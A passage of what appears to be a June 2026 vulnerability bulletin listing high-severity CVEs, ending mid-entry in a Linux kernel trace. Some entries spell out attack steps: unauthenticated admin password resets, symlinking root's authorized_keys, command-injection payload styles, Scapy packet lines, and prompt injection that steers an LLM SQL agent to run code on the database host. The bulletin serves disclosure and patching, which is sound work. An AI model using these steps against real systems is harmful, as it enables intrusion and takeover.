| Dräger--Infinity Acute Care System | Dräger Infinity Acute Care System and Standalone Infinity M540 patient monitors running software versions VG4.1.1, VG4.0.3, and lower contain network message handling vulnerabilities that allow network-adjacent attackers to spoof or tamper with data and cause denial-of-service conditions. Attackers with access to an enabled Infinity network port or physical proximity to a wireless access point can modify device settings such as alarm states or alarm limits, and overwhelm the system with incoming data causing the device to reboot and lose network functionality. | 2026-06-02 | 8.6 | CVE-2019-25719 |
| Dräger--Infinity Acute Care System | Dräger Infinity Acute Care System and Standalone Infinity M540 patient monitors versions VG4.1.1, VG4.0.3, and lower (with VG4.2 partially affected) contain a network message handling vulnerability that allows remote attackers to inject spoofed or tampered data and cause denial-of-service conditions. Attackers can compromise network communications to modify device settings such as alarm states or alarm limits, or overwhelm the system with excessive network traffic causing the Cockpit or M540 to reboot and lose network functionality. | 2026-06-02 | 8.6 | CVE-2022-4992 |
| Dräger--Infinity Explorer C700 | Dräger Infinity Explorer C700 contains a privilege escalation vulnerability that allows attackers to break out of kiosk mode and access the underlying operating system through a specific dialog interaction. Attackers can exploit this kiosk escape to take control of the operating system and cause the device to display incorrect or no information from the connected Delta Family patient monitor. | 2026-06-01 | 8.4 | CVE-2019-25718 |
| Dräger--Protector Software | Dräger Protector Software prior to version 6.4.2 contains a local privilege escalation vulnerability due to insecure file system permissions that allows local attackers to execute arbitrary code with elevated privileges. Attackers can replace binaries or loaded modules on the host system to execute code with NT SYSTEM privileges. | 2026-06-02 | 8.2 | CVE-2021-4480 |
| Dräger--Protector Software | Dräger Protector Software prior to version 6.4.2 contains a local privilege escalation vulnerability due to insecure file system permissions that allows local attackers to execute arbitrary code with elevated privileges. Attackers can replace binaries or loaded modules on the host system to execute code with NT SYSTEM privileges. | 2026-06-02 | 8.2 | CVE-2021-4481 |
| Dräger--SC 6002XL | Dräger SC Monitoring devices (SC 6002XL, SC 6802XL, SC 7000, SC 8000, SC 9000 XL) contain hard-coded plaintext credentials in source code and a denial-of-service vulnerability that allows local and remote attackers to compromise device integrity across all software versions. A local attacker with direct device access can use the hard-coded credentials to access service and clinical accounts and alter device configuration, while a remote attacker can send malformed network packets to cause repeated device reboots, ultimately resulting in loss of network connectivity and disruption of patient monitoring. | 2026-06-02 | 7.6 | CVE-2019-25722 |
| DTS Electronics Industry and Trade Ltd. Co.--Redline WR3200 | Improper Authentication, Missing authentication for critical function, Weak Authentication vulnerability in DTS Electronics Industry and Trade Ltd. Co. Redline WR3200 allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Redline WR3200: from 7.1.3 before 7.1.8. | 2026-06-05 | 9.8 | CVE-2026-6274 |
| E2Pdf.com--e2pdf | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in E2Pdf.Com e2pdf allows Reflected XSS. This issue affects e2pdf: from n/a through 1.32.14. | 2026-06-01 | 7.1 | CVE-2026-42681 |
| e4jvikwp--VikBooking Hotel Booking Engine & PMS | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in e4jvikwp VikBooking Hotel Booking Engine & PMS allows DOM-Based XSS. This issue affects VikBooking Hotel Booking Engine & PMS: from n/a through 1.8.8. | 2026-06-01 | 7.1 | CVE-2026-42683 |
| ealpha072--Student-Management-System | A vulnerability was identified in ealpha072 Student-Management-System up to 01451bd7a2f58cdda07bd0b86e3967582e3ecd08. Affected by this issue is some unknown functionality of the file admin/config.php of the component Administrative Backend. Such manipulation leads to improper authentication. The attack may be performed from remote. The exploit is publicly available and might be used. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-03 | 7.3 | CVE-2026-10777 |
| eitube--EI-Tube | PHP EI-Tube Script 3 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the search parameter. Attackers can send GET requests to the search endpoint with crafted SQL payloads in the query parameter to extract sensitive database information including usernames, passwords, and version details. | 2026-06-04 | 8.2 | CVE-2019-25732 |
| Elated-Themes--Aperitif | Deserialization of Untrusted Data vulnerability in Elated-Themes Aperitif allows Object Injection. This issue affects Aperitif: from n/a through 1.6. | 2026-06-02 | 8.1 | CVE-2026-39550 |
| Elated-Themes--Askka | Deserialization of Untrusted Data vulnerability in Elated-Themes Askka allows Object Injection. This issue affects Askka: from n/a through 1.3.1. | 2026-06-02 | 8.1 | CVE-2026-39555 |
| Elated-Themes--Töbel | Deserialization of Untrusted Data vulnerability in Elated-Themes Töbel allows Object Injection. This issue affects Töbel: from n/a through 1.8.1. | 2026-06-02 | 8.1 | CVE-2026-39551 |
| eliekhoury--WP AutoSuggest | WP AutoSuggest 0.24 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the wpas_keys parameter. Attackers can send GET requests to autosuggest.php with crafted wpas_keys values to extract sensitive database information from WordPress posts and other tables. | 2026-06-01 | 8.2 | CVE-2018-25434 |
| Enderfga--claw-orchestrator | A weakness has been identified in Enderfga claw-orchestrator up to 3.5.5. This affects the function EmbeddedServer of the file src/embedded-server.ts of the component API Endpoint. This manipulation causes missing authentication. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. Upgrading to version 3.5.6 mitigates this issue. Patch name: d0b02a800aa0689d9428cc4cc170e0b6589fb2c3. The affected component should be upgraded. | 2026-06-01 | 7.3 | CVE-2026-10281 |
| erzhongxmu--JeeWMS | A security flaw has been discovered in erzhongxmu JeeWMS up to 141740afb2ba14d441c82a833d0a418d07ca2d69. This vulnerability affects unknown code of the file /base-boot/jmreport/testConnection of the component JimuReport test-connection Endpoint. Performing a manipulation of the argument dbType/dbDriver/dbUrl/dbUsername/dbPassword results in injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-07 | 7.3 | CVE-2026-11457 |
| EventPrime--EventPrime | Missing Authorization vulnerability in EventPrime allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects EventPrime: from n/a through 4.3.2.0. | 2026-06-02 | 7.5 | CVE-2026-42669 |
| Fox-themes--Prague | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Fox-themes Prague allows Reflected XSS. This issue affects Prague: from n/a through 2.2.8. | 2026-06-03 | 7.1 | CVE-2025-15654 |
| framework-y--Hybrid Composer | WordPress Hybrid Composer 1.4.6 contains an unauthenticated settings change vulnerability that allows unauthenticated attackers to modify WordPress options by exploiting the hc_ajax_save_option action. Attackers can send POST requests to the admin-ajax.php endpoint with the action parameter set to hc_ajax_save_option to enable user registration and set the default role to administrator, enabling account takeover. | 2026-06-04 | 9.8 | CVE-2019-25738 |
| freedesktop--libinput | In libinput before 1.30.4 and 1.31.x before 1.31.3, libinput-device-group unescaped phys output can inject udev properties leading to arbitrary root code execution. | 2026-06-04 | 7.4 | CVE-2026-50292 |
| FreeIPMI--FreeIPMI | ipmi-oem in FreeIPMI before 1.6.18 has exploitable buffer overflows on response messages. The Intelligent Platform Management Interface (IPMI) specification defines a set of interfaces for platform management. It is implemented by a large number of hardware manufacturers to support system management. It is most commonly used for sensor reading (e.g., CPU temperatures through the ipmi-sensors command within FreeIPMI) and remote power control (the ipmipower command). The ipmi-oem client command implements a set of IPMI OEM commands for specific hardware vendors. If a user has supported hardware, they may wish to use the ipmi-oem command to send a request to a server to retrieve specific information. Two subcommands "ipmi-oem dell get-active-directory-config" and "ipmi-oem fujitsu get-sel-entry-long-text" were found to have exploitable buffer overflows on response messages. | 2026-06-03 | 7.5 | CVE-2026-50031 |
| froxlor--froxlor | Froxlor is open source server administration software. Version 2.3.6 contains a symlink-following flaw in the root-owned SSH key synchronization path used for customer FTP users. The provisioning code appends public keys to `~/.ssh/authorized_keys` under a customer-controlled home directory without verifying that the target path is not a symbolic link. If an attacker controls a shell-enabled customer account and can modify files inside the assigned home directory, the attacker can replace `~/.ssh/authorized_keys` with a symlink to `/root/.ssh/authorized_keys`. When Froxlor's privileged cron task later synchronizes SSH keys, it appends the attacker-supplied key into root's authorized key file, resulting in root SSH access. Version 2.3.7 contains a patch. | 2026-06-04 | 8.8 | CVE-2026-41236 |
| froxlor--froxlor | Froxlor is open source server administration software. Prior to version 2.3.7, the `DomainZones.add` API endpoint does not sanitize newline characters in TXT record content. An authenticated customer with DNS editing enabled can inject newlines into TXT record values, which break out of the record line in the generated BIND zone file. This enables injection of arbitrary BIND directives (`$INCLUDE`, `$GENERATE`) and arbitrary DNS records (A, MX, CNAME) into the zone file written to disk by the DNS rebuild cron. This is an incomplete fix for CVE-2026-30932 (GHSA-x6w6-2xwp-3jh6), which patched the same newline injection for LOC, RP, SSHFP, and TLSA record types but did not patch TXT records. Version 2.3.7 contains an updated patch. | 2026-06-04 | 7.6 | CVE-2026-41234 |
| Genetec Inc.--Genetec Security Center | A high security vulnerability affecting Security Center main server installations has been identified. It could allow an attacker with local OS privileges to the main server to access the Server Admin credentials. A third party hired by Genetec found the issue. There is currently no evidence of active exploitation. This vulnerability is associated with specific installation package builds rather than the product version identifier alone. Certain versions (including 5.10.4.0, 5.11.3.0, 5.12.2.0 and 5.13.3.0) were released with both vulnerable and remediated installation packages under the same version number. Consequently, version-based comparison alone is insufficient to determine exposure. Only installations performed using vulnerable builds are affected. Remediated builds can be distinguished using verified installation package hashes. For the complete list of fixed build hashes, refer to the security advisory section. | 2026-06-02 | 7.8 | CVE-2026-40619 |
| GL.iNet--GL-MT3000 | A vulnerability was detected in GL.iNet GL-MT3000 4.4.5. This affects the function dlopen in the library /usr/lib/oui-httpd/rpc/ of the component Path Normalization Handler. Performing a manipulation of the argument dev_name results in command injection. It is possible to initiate the attack remotely. Upgrading to version 4.7 mitigates this issue. It is advisable to upgrade the affected component. The vendor confirms: "From version 4.7 onward, we have enabled method-level validation at the HTTP /rpc layer. nas-web.eject_disk is no longer in the whitelist of allowed methods. Consequently, directly calling eject_disk through the default /rpc endpoint returns Invalid params, preventing entry into subsequent dangerous functions and blocking the remote exploit chain described in the report." | 2026-06-07 | 7.3 | CVE-2026-11450 |
| GL.iNet--GL-MT3000 | A flaw has been found in GL.iNet GL-MT3000 4.4.5. This impacts the function snprintf of the file /cgi-bin/glc of the component FTP Protocol Handler. Executing a manipulation of the argument media_dir can lead to command injection. It is possible to launch the attack remotely. Upgrading to version 4.8.1 will fix this issue. You should upgrade the affected component. The vendor explains: "In version 4.8.1, before writing media_dir to the FTP configuration command, the code escapes single quotes using escape_single_quote(). The payloads in the report, which rely on closing a single quote, appending commands with a semicolon, and commenting out the tail with #, cannot escape execution under the current code path. We also verified this on a GL-MT3000 device running firmware version 4.8.1 using similar payloads calling the /NAS_API_SET_PROTO_CONFIG interface. Although the interface returned success, the marker file intended to prove command execution was not created; the payload was written into /etc/vsftpd.conf only as ordinary configuration content and did not trigger any shell command execution. Therefore, with the current firmware version and default runtime environment, we could not reproduce the claimed 'unauthorized command injection in set_proto_config'." | 2026-06-07 | 7.3 | CVE-2026-11451 |
| GL.iNet--GL-MT3000 | A vulnerability has been found in GL.iNet GL-MT3000 up to 4.4.5. Affected is the function FUN_0042e200 of the file /cgi-bin/glc of the component SET_USER_PWD Handler. The manipulation of the argument Password leads to command injection. The attack can be initiated remotely. Upgrading to version 4.8.1 is able to address this issue. The affected component should be upgraded. The vendor explains: "The current code escapes single quotes in the password parameter and handles it inside a shell single-quote context. The payloads in the report, which rely on $() or backticks to trigger command substitution, are not executed under the current code path. We tested on a GL-MT3000 device running firmware 4.8.1 using similar payloads, and no command-execution marker file was created." | 2026-06-07 | 7.3 | CVE-2026-11452 |
| goauthentik--authentik | authentik is an open-source identity provider. Prior to versions 2025.12.5 and 2026.2.3, due to the implementation of stages in the SFE (Simple Flow Executor) in order to make the interface more compatible with legacy browsers, it was possible to use an XSS exploit in the AutosubmitStage. This issue has been patched in versions 2025.12.5 and 2026.2.3. | 2026-06-02 | 9.3 | CVE-2026-42849 |
| goauthentik--authentik | authentik is an open-source identity provider. Prior to versions 2025.12.6, 2026.2.4, and 2026.5.1, the Source stage can be bypassed by sending an empty POST. This issue has been patched in versions 2025.12.6, 2026.2.4, and 2026.5.1. | 2026-06-02 | 9.8 | CVE-2026-49448 |
| goauthentik--authentik | authentik is an open-source identity provider. Prior to versions 2025.12.5, 2026.2.3, and 2026.5.1, authentik's SAML Source ACS endpoint is vulnerable to XML Signature Wrapping when validating upstream SAML responses. An attacker with any account at the upstream IdP can reuse a valid signed assertion to authenticate as another federated user. This issue has been patched in versions 2025.12.5, 2026.2.3, and 2026.5.1. | 2026-06-02 | 8.5 | CVE-2026-47201 |
| goauthentik--authentik | authentik is an open-source identity provider. Prior to versions 2025.12.6, 2026.2.4, and 2026.5.1, an attacker with the ability to change a source connection, and an account in one of the configured sources can log into any account. This issue has been patched in versions 2025.12.6, 2026.2.4, and 2026.5.1. | 2026-06-02 | 8.8 | CVE-2026-49443 |
| goFrendiAsgard--No-CMS | No-Cms 1.0 contains an SQL injection vulnerability in the order_by parameter of the manage_privilege export endpoint that allows authenticated attackers to manipulate database queries. Attackers can submit POST requests to /nocms/main/manage_privilege/index/export with malicious SQL code in the order_by[0] parameter to extract sensitive database information. | 2026-06-01 | 7.1 | CVE-2018-25431 |
| Graphite project--Graphite | Graphite before 1.3.15 has an integer underflow and resultant out-of-bounds write via Graphite actions, because slotat does not ensure that an offset is within the allowed slot-map range. | 2026-06-05 | 7.3 | CVE-2026-50593 |
| guardrails-ai--guardrails | Guardrails AI is a Python framework that helps build AI applications. On May 11, 2026 at approximately 6:00 PM Pacific, an attacker published a malicious version of `guardrails-ai` (0.10.1) to PyPI. Any user who installed `guardrails-ai==0.10.1` from PyPI on May 11, 2026 may be affected. Security researchers identified the malicious package within approximately 2 hours of publication, and PyPI quarantined the repository. Based on our telemetry, Guardrails AI maintainers have observed no requests to Guardrails AI infrastructure originating from the malicious 0.10.1 version, and a review of system and access logs has produced no evidence of user data exfiltration through their systems. Users should upgrade to version 0.10.2 or downgrade to version 0.10.0, both of which are unaffected. Those who installed version 0.10.1 should rotate any credentials accessible from their machine (GitHub PATs, cloud provider keys, package registry tokens, API keys) and audit their GitHub account for unauthorized workflows or repositories. | 2026-06-05 | 9.6 | CVE-2026-45758 |
| H3C--Magic B0 | A security vulnerability has been detected in H3C Magic B0 up to 100R002. The affected element is the function SetMobileAPInfoById of the file /goform/aspForm. Such manipulation of the argument param leads to stack-based buffer overflow. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-01 | 8.8 | CVE-2026-10259 |
| haxtheweb--haxcms-php | HAX CMS helps manage microsite universe with PHP or NodeJs backends. Prior to version 26.0.0 of HAX CMS PHP, the `saveFile` endpoint validates upload extensions case-insensitively and writes the filename to disk verbatim, but the `.htaccess` rule that forces `Content-Disposition: attachment` on HTML files is case-sensitive. An HTML file uploaded with an uppercase extension (`.HTML`, `.Html`, `.HTM`) is still served as `text/html` but the forced-download header never applies, so the browser renders it inline and executes any embedded JavaScript in the HAXcms origin. This bypasses the mitigation shipped for CVE-2026-22704. Version 26.0.0 contains a fix. | 2026-06-05 | 8.7 | CVE-2026-46392 |
| haxtheweb--haxcms-php | HAX CMS helps manage microsite universe with PHP or NodeJs backends. Versions prior to 26.0.1 use `uniqid` for generating salts, which is unsuitable. Version 26.0.1 fixes the issue. | 2026-06-05 | 7.5 | CVE-2026-46493 |
| HCL--Hive | HCL Hive Telco Observability is affected by an issue of required directives missing from the Content Security Policy (CSP), detected in the Keycloak component of the web application. Missing essential directives can leave a site vulnerable. | 2026-06-04 | 8.1 | CVE-2025-59874 |
| HCL--iControl | HCL iControl was affected by an Export CSV - CSV Injection vulnerability. It is vulnerable to a reflected cross-site scripting vulnerability. This was caused by insufficient sanitization of input parameters. | 2026-06-04 | 7.1 | CVE-2025-52612 |
| hippooo--Hippoo Mobile App for WooCommerce | The Hippoo Mobile App for WooCommerce plugin for WordPress is vulnerable to Authentication Bypass leading to Administrator Account Takeover in all versions up to and including 1.9.4. This is due to a logic conflation in HippooPermissions::get_user_permissions(), which returns the same null sentinel for both administrators and unauthenticated visitors - a value that HippooPermissions::has_role_access() unconditionally interprets as full administrator access - causing override_extension_permission_callback() to assign __return_true as the permission callback for every WordPress and WooCommerce REST route cloned under /wc-hippoo/v1/ext/ by HippooControllerWithAuth::re_register_external_routes(), while the block_unauthorized_access() pre-dispatch guard fails to block unauthenticated users for the same reason. This makes it possible for unauthenticated attackers to invoke any core REST endpoint without credentials - most critically, sending a POST request to /wc-hippoo/v1/ext/wp/v2/users/<id> with a {"password":"<new_password>"} body to reset the password of any WordPress user, including the site administrator, and gain full administrative control of the site. | 2026-06-05 | 9.8 | CVE-2026-10580 |
| horizon921--mcpilot | A security flaw has been discovered in horizon921 mcpilot 0.1.0. The impacted element is an unknown function of the file client/src/app/api/mcp/call/route.ts of the component MCP API Call Endpoint. The manipulation of the argument serverBaseUrl results in server-side request forgery. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-01 | 7.3 | CVE-2026-10280 |
| IBM--i Access Family | IBM i Access Client Solutions (ACS), part of IBM i Access Family 1.1.5.0 through 1.1.9.12, is vulnerable to remote code execution when configured to listen for requests from IBM i Navigator. | 2026-06-01 | 8.8 | CVE-2026-7770 |
| IBM--WebSphere Application Server | IBM WebSphere Application Server 9.0 and 8.5 are vulnerable to identity spoofing. | 2026-06-01 | 9.1 | CVE-2026-8644 |
| IBM--WebSphere Application Server | IBM WebSphere Application Server 9.0 and 8.5 are vulnerable to remote code execution caused by the bypass of security controls. | 2026-06-01 | 9 | CVE-2026-9311 |
| IBM--WebSphere Application Server | IBM WebSphere Application Server 9.0 and 8.5 are vulnerable to potential remote code execution due to deserialization of untrusted data via JAX-WS endpoints with WS-Security. | 2026-06-01 | 9 | CVE-2026-9319 |
| IBM--WebSphere Application Server | IBM WebSphere Application Server 9.0 and 8.5 are affected by improper validation of user-supplied data during deserialization in the SAML Web Single Sign-On component. This could result in remote code execution via a crafted HTTP request when combined with a suitable gadget chain. | 2026-06-01 | 8.5 | CVE-2026-9330 |
| itsourcecode--Online Blood Bank Management System | A vulnerability was identified in itsourcecode Online Blood Bank Management System 1.0. Impacted is an unknown function of the file /admin/viewrequest.php. Such manipulation of the argument ID leads to sql injection. The attack can be executed remotely. The exploit is publicly available and might be used. | 2026-06-01 | 7.3 | CVE-2026-10249 |
| itsourcecode--Online Blood Bank Management System | A security flaw has been discovered in itsourcecode Online Blood Bank Management System 1.0. The affected element is an unknown function of the file /admin/campsdetails.php. Performing a manipulation of the argument hospital results in sql injection. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. | 2026-06-01 | 7.3 | CVE-2026-10250 |
| itsourcecode--Online House Rental System | A weakness has been identified in itsourcecode Online House Rental System 1.0. The impacted element is an unknown function of the file /ajax.php?action=login. Executing a manipulation of the argument Username can lead to sql injection. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks. | 2026-06-01 | 7.3 | CVE-2026-10251 |
| itsourcecode--Online House Rental System | A security vulnerability has been detected in itsourcecode Online House Rental System 1.0. This affects an unknown function of the file /manage_tenant.php. The manipulation of the argument ID leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. | 2026-06-01 | 7.3 | CVE-2026-10252 |
| itsourcecode--Online House Rental System | A vulnerability was detected in itsourcecode Online House Rental System 1.0. This impacts an unknown function of the file /manage_payment.php. The manipulation of the argument ID results in sql injection. It is possible to launch the attack remotely. The exploit is now public and may be used. | 2026-06-01 | 7.3 | CVE-2026-10253 |
| Ivanti--Neurons for ITSM (On-Premises) | An Improper Access Control vulnerability in Ivanti Neurons for ITSM (cloud and on-premises) allows a remote authenticated attacker to gain administrative access. | 2026-06-01 | 8.8 | CVE-2026-9614 |
| jgwhite33--Google Review Slider | WordPress Plugin Google Review Slider 6.1 contains a time-based blind SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the 'tid' parameter. Attackers can send GET requests to the admin interface with malicious 'tid' values to extract sensitive database information using time-based blind SQL injection techniques. | 2026-06-04 | 8.2 | CVE-2019-25745 |
| jhorowitz--Content Visibility for Divi Builder | The Content Visibility for Divi Builder plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.02 via the 'et_pb_text' shortcode 'cvdb_content_visibility_check' parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server. | 2026-06-02 | 8.8 | CVE-2026-1829 |
| JingDong--JD Cloud Box AX6600 | A security vulnerability has been detected in JingDong JD Cloud Box AX6600 4.5.3.r4546. The impacted element is the function set_macfilter of the file /sbin/jdcweb_rpc. The manipulation leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-06 | 8.8 | CVE-2026-11413 |
| Jinher--OA | A security vulnerability has been detected in Jinher OA 1.0. This affects an unknown function of the file nextselectplan.aspx. Such manipulation of the argument httpOID leads to sql injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-06 | 7.3 | CVE-2026-11435 |
| Joomlaextensions--JE Photo Gallery | Joomla Component JE Photo Gallery 1.1 contains an SQL injection vulnerability that allows unauthenticated attackers to extract database information by injecting malicious SQL code through the categoryid parameter. Attackers can send GET requests to index.php with crafted categoryid values in the com_jephotogallery component to execute arbitrary SQL queries and retrieve sensitive data like usernames and password hashes. | 2026-06-01 | 8.2 | CVE-2018-25433 |
| jxxghp--MoviePilot | MoviePilot contains a path traversal vulnerability in the AliPan, U115, and Rclone cloud storage download handlers where the local destination path is constructed by concatenating the configured download directory with a filename taken directly from remote cloud API metadata without basename normalization or path validation. An attacker who controls a filename returned by a remote cloud storage API can include traversal sequences ../ in the filename to cause downloaded content to be written outside the configured download directory, potentially overwriting arbitrary files including configuration or plugin files reachable by the application process. | 2026-06-05 | 8.1 | CVE-2026-11416 |
| kiteworks--Secure Data Forms | Kiteworks is a private data network (PDN). Prior to version 9.3.0, a reflected XSS vulnerability in Kiteworks Secure Data Forms could allow an external attacker to trick a user into executing arbitrary JavaScript code. Upgrade Kiteworks to version 9.3.0 or later to receive a patch. | 2026-06-01 | 8.2 | CVE-2026-24751 |
| kiteworks--Secure Data Forms | Kiteworks is a private data network (PDN). Prior to version 9.3.0, a reflected XSS vulnerability in Kiteworks Secure Data Forms could allow an external attacker to trick a user into executing arbitrary JavaScript code. Upgrade Kiteworks to version 9.3.0 or later to receive a patch. | 2026-06-01 | 8.2 | CVE-2026-24752 |
| kiteworks--Secure Data Forms | Kiteworks is a private data network (PDN). Prior to version 9.3.0, multiple SQL Injection vulnerabilities in Kiteworks Secure Data Forms could be exploited by an authenticated attacker with the FormBuilder role to retrieve information on or modify other users' form definitions and some global configuration parameters. Upgrade Kiteworks to version 9.3.0 or later to receive a patch. | 2026-06-01 | 7.6 | CVE-2026-24782 |
| Kurt Software Studio--WriteUp Mobile App | Improper Access Control, Missing Authorization vulnerability in Kurt Software Studio WriteUp Mobile App allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects WriteUp Mobile App: from 1.3.0 through 04062026. | 2026-06-04 | 8.8 | CVE-2026-5228 |
| Labf--LabF nfsAxe | LabF nfsAxe 3.7 Ping Client contains a buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying a malicious payload in the Host IP field. Attackers can craft a specially formatted input file with shellcode and overwrite the return address to execute calc.exe or other arbitrary commands. | 2026-06-04 | 8.4 | CVE-2019-25736 |
| langroid--langroid | Langroid is a framework for building large-language-model-powered applications. Prior to version 0.63.0, SQLChatAgent executes SQL produced by an LLM, which is influenceable by prompt injection. When configured with a database role that has privileges enabling code execution or filesystem access (e.g., PostgreSQL pg_execute_server_program, MySQL FILE, MSSQL xp_cmdshell), an attacker who can shape the agent's input - including indirectly via data returned to the LLM - can coerce execution of dialect-specific primitives such as `COPY ... FROM PROGRAM`, achieving RCE on the database host. Fixed in v0.63.0 by defaulting SQLChatAgent to a SELECT-only sqlglot-parsed statement allowlist with a dialect-aware dangerous-pattern blocklist; allow_dangerous_operations=True restores the previous unrestricted behavior for trusted deployments. | 2026-06-01 | 9.8 | CVE-2026-25879 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_inner: Fix IPv6 inner_thoff desync In nft_inner_parse_l2l3(), when processing inner IPv6 packets, ipv6_find_hdr() correctly computes the transport header offset traversing all extension headers, but the result is immediately overwritten with nhoff + sizeof(_ip6h) (40 bytes), which only accounts for the IPv6 base header. This creates a desync between inner_thoff (wrong - points to extension header start) and l4proto (correct - e.g., IPPROTO_TCP), enabling transport header forgery and potential firewall bypass. This issue affects stable versions from Linux 6.2. For comparison, the normal (non-inner) IPv6 path correctly preserves ipv6_find_hdr()'s result. Removing the incorrect overwrite ensures that ipv6_find_hdr()'s calculated transport header offset is preserved, thereby fixing the desynchronization. | 2026-06-03 | 9.1 | CVE-2026-46244 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: inet: RAW sockets using IPPROTO_RAW MUST drop incoming ICMP Yizhou Zhao reported that simply having one RAW socket on protocol IPPROTO_RAW (255) was dangerous. socket(AF_INET, SOCK_RAW, 255); A malicious incoming ICMP packet can set the protocol field to 255 and match this socket, leading to FNHE cache changes. inner = IP(src="192.168.2.1", dst="8.8.8.8", proto=255)/Raw("TEST") pkt = IP(src="192.168.1.1", dst="192.168.2.1")/ICMP(type=3, code=4, nexthopmtu=576)/inner "man 7 raw" states: A protocol of IPPROTO_RAW implies enabled IP_HDRINCL and is able to send any IP protocol that is specified in the passed header. Receiving of all IP protocols via IPPROTO_RAW is not possible using raw sockets. Make sure we drop these malicious packets. | 2026-06-03 | 9.1 | CVE-2026-46266 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix block_group_tree dirty_list corruption When the incompat flag EXTENT_TREE_V2 is set, we unconditionally add the block group tree to the switch_commits list before calling switch_commit_roots, as we do for the tree root and the chunk root. However, the block group tree uses normal root dirty tracking and in any transaction that does an allocation and dirties a block group, the block group root will already be linked to a list by the dirty_list field and this use of list_add_tail() is invalid and corrupts the prev/next members of block_group_root->dirty_list. This is apparent on a subsequent list_del on the prev if we enable CONFIG_DEBUG_LIST: [32.1571] ------------[ cut here ]------------ [32.1572] list_del corruption. next->prev should be ffff958890202538, but was ffff9588992bd538. (next=ffff958890201538) [32.1575] WARNING: lib/list_debug.c:65 at 0x0, CPU#3: sync/607 [32.1583] CPU: 3 UID: 0 PID: 607 Comm: sync Not tainted 6.18.0 #24 PREEMPT(none) [32.1585] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.17.0-4.fc41 04/01/2014 [32.1587] RIP: 0010:__list_del_entry_valid_or_report+0x108/0x120 [32.1593] RSP: 0018:ffffaa288287fdd0 EFLAGS: 00010202 [32.1594] RAX: 0000000000000001 RBX: ffff95889326e800 RCX: ffff958890201538 [32.1596] RDX: ffff9588992bd538 RSI: ffff958890202538 RDI: ffffffff82a41e00 [32.1597] RBP: ffff958890202538 R08: ffffffff828fc1e8 R09: 00000000ffffefff [32.1599] R10: ffffffff8288c200 R11: ffffffff828e4200 R12: ffff958890201538 [32.1601] R13: ffff95889326e958 R14: ffff958895c24000 R15: ffff958890202538 [32.1603] FS: 00007f0c28eb5740(0000) GS:ffff958af2bd2000(0000) knlGS:0000000000000000 [32.1605] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [32.1607] CR2: 00007f0c28e8a3cc CR3: 0000000109942005 CR4: 0000000000370ef0 [32.1609] Call Trace: [32.1610] <TASK> [32.1611] switch_commit_roots+0x82/0x1d0 [btrfs] [32.1615] btrfs_commit_transaction+0x968/0x1550 [btrfs] [32.1618] ? btrfs_attach_transaction_barrier+0x23/0x60 [btrfs] [32.1621] __iterate_supers+0xe8/0x190 [32.1622] ? __pfx_sync_fs_one_sb+0x10/0x10 [32.1623] ksys_sync+0x63/0xb0 [32.1624] __do_sys_sync+0xe/0x20 [32.1625] do_syscall_64+0x73/0x450 [32.1626] entry_SYSCALL_64_after_hwframe+0x76/0x7e [32.1627] RIP: 0033:0x7f0c28d05d2b [32.1632] RSP: 002b:00007ffc9d988048 EFLAGS: 00000246 ORIG_RAX: 00000000000000a2 [32.1634] RAX: ffffffffffffffda RBX: 00007ffc9d988228 RCX: 00007f0c28d05d2b [32.1636] RDX: 00007f0c28e02301 RSI: 00007ffc9d989b21 RDI: 00007f0c28dba90d [32.1637] RBP: 0000000000000001 R08: 0000000000000001 R09: 0000000000000000 [32.1639] R10: 0000000000000000 R11: 0000000000000246 R12: 000055b96572cb80 [32.1641] R13: 000055b96572b19f R14: 00007f0c28dfa434 R15: 000055b96572b034 [32.1643] </TASK> [32.1644] irq event stamp: 0 [32.1644] hardirqs last enabled at (0): [<0000000000000000>] 0x0 [32.1646] hardirqs last disabled at (0): [<ffffffff81298817>] copy_process+0xb37/0x2260 [32.1648] softirqs last enabled at (0): [<ffffffff81298817>] copy_process+0xb37/0x2260 [32.1650] softirqs last disabled at (0): [<0000000000000000>] 0x0 [32.1652] ---[ end trace 0000000000000000 ]--- Furthermore, this list corruption eventually (when we happen to add a new block group) results in getting the switch_commits and dirty_cowonly_roots lists mixed up and attempting to call update_root on the tree root which can't be found in the tree root, resulting in a transaction abort: [87.8269] BTRFS critical (device nvme1n1): unable to find root key (1 0 0) in tree 1 [87.8272] ------------[ cut here ]------------ [87.8274] BTRFS: Transaction aborted (error -117) [87.8275] WARNING: fs/btrfs/root-tree.c:153 at 0x0, 